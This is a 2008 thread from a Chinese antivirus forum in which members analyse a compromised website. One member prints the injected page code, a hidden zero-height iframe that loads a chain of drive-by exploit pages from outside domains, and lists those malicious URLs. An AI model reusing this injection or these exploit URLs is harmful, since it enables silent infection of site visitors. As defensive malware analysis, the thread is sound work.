查看: 2832|回复: 13
收起左侧

[已鉴定] 可疑网站

 关闭 [复制链接]
a87750530
发表于 2008-10-17 15:32:36 | 显示全部楼层 |阅读模式
http://www.1000fr.com
可疑网站,请高手看看,打开后红伞不停的报!
神武军师
发表于 2008-10-17 15:37:44 | 显示全部楼层
被挂马了
kingmuro
头像被屏蔽
发表于 2008-10-17 15:57:18 | 显示全部楼层
诺顿10.1版本没报
fzz8848
头像被屏蔽
发表于 2008-10-17 15:59:25 | 显示全部楼层

回复 1楼 a87750530 的帖子

我的小三未报
mox
发表于 2008-10-17 16:15:44 | 显示全部楼层
MS正常.
lingbo110120
发表于 2008-10-17 16:22:17 | 显示全部楼层
刚刚FreShow毕业  找不出东西
呜呜 filter不出来   看来还得继续学习探索

tanlimo怎么找出来的   继续教我

[ 本帖最后由 lingbo110120 于 2008-10-17 16:23 编辑 ]
tanlimo
发表于 2008-10-17 16:35:19 | 显示全部楼层
这个FreShow找不出来的

地址是个变量
  1. http://googlehaocpczhongyi.haocpc.net/show.php?z_uid=106&zoneid=155&z_uc_ks=7740&z_sh=663&z_sw=1016&z_scd=32&z_c_url=http%3A//www.1000fr.com/&z_utz=8&z_ujava=1&z_ufv=9.0.115.0
复制代码


在沙盘里找到生成的show[1].htm文件

内容


  1. <iframe src=http://www.hryspan.cn/one/a39.htm width=50 height=0 border=0></iframe>                                          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=gbk" /><script>
  2. var a_x=new Array();
  3. var a_y=new Array();
  4. var i=0;
  5. a_x[0]=0;
  6. a_y[0]=0;
  7. function v(s) {window.status = s;return true;}
  8. function o() {window.status='';}
  9. function c(o,e){a=document.getElementById(o); e=e?e:window.event?window.event:null;x=e?e.screenX:null;y=e?e.screenY:null;a.href+='&x='+x+'&y='+y+'&ax='+a_x+'&ay='+a_y;}
  10. function h(e){e=e?e:window.event?window.event:null;x=e?e.screenX:null;y=e?e.screenY:null;if(i>6) return ;a_x[i]=x;a_y[i]=y;i++;}
  11. </script>
  12. <script src='/javascript/swf.js'></script>
  13.      <a id='ua' target=_blank href='http://googlehaocpczhongyi.haocpc.net/iclk/?au=c2l0ZXVybD1odHRwJTNBJTJGJTJGd3d3LjEwMDBmci5jb20lMkYmcmVmZXJlcj0ma2V5d29yZD0mc2NyZWVuPTY2M3gxMDE2eDMyJnRpbWV6b25lPTgmamF2YT0xJmZsYXNoPTkuMC4xMTUuMCZwbHVnaW5zPSZtaW1ldHlwZXM9Jmhpc3Rvcnk9JnNjcm9sbGhlaWdodD03NzQwJnZpZXd0aW1lPTEyMjQyMzExNTU=;53d2c1ab40e07f707c27ae2c1bd77b1f&zty=img&uid=106&aid=73&zid=155&targeturl=http%3A%2F%2Fa.oadz.com%2Flink%2FC%2F763%2F112137%2FAiNca-1MFiXgK4fjYLATAgLL72E_%2Fa%2F2085%3Ftrust.alipay.com%2Fdream.htm+' onMouseOver='h(event)' onfocus='return v("")' onclick='c("ua",event)' onmouseout='o()'>
  14.      <div style='cursor:pointer;z-index:100;position:absolute;height:90px;width:728px;background-color:#fff;opacity:0.01;filter:alpha(opacity:1);'></div></a>
  15.      <div style='height:90px;width:728px;overflow:hidden;'>
  16.      <SCRIPT LANGUAGE='JavaScript'>
  17.      CreateFlash('73','http://googlehaocpczhongyi.haocpc.net/a/2008-09-27/122250114147492676.swf','728','90');
  18.      </SCRIPT>
  19.      </div>
复制代码


跟踪
  1. http://www.hryspan.cn/one/a39.htm
复制代码



老东西了

Log is generated by FreShow.
[wide]http://www.hryspan.cn/one/a39.htm
    [frame]http://zlwrnm9.cn/a133/fxx.htm
        [frame]http://zlwrnm9.cn/a133/fx.htm
        [frame]http://zlwrnm9.cn/a133/ss.html
        [frame]http://zlwrnm9.cn/a133/Ms06014.htm
        [frame]http://zlwrnm9.cn/sina.htm
        [frame]http://zlwrnm9.cn/UU.htm
        [frame]http://zlwrnm9.cn/a133/Thunder.html
        [frame]http://zlwrnm9.cn/a133/GLWORLD.html
        [frame]http://zlwrnm9.cn/a133/real.htm
        [frame]http://zlwrnm9.cn/a133/Real.html
    [script]http://js.users.51.la/1936348.js
Palkia
发表于 2008-10-17 19:30:52 | 显示全部楼层
病毒        2008-10-17  19:30:07        病毒在文件C:\Documents and Settings\Administrator\桌面\a133.css.td中        Win32.Troj.OnlineGameT.bd.65697        处理成功(操作:删除)
alexto1926
发表于 2008-10-17 19:39:42 | 显示全部楼层
风软挂的这个毒有一段日子了,不知怎的,站长还没有发现呢。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 04:43 , Processed in 0.125058 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表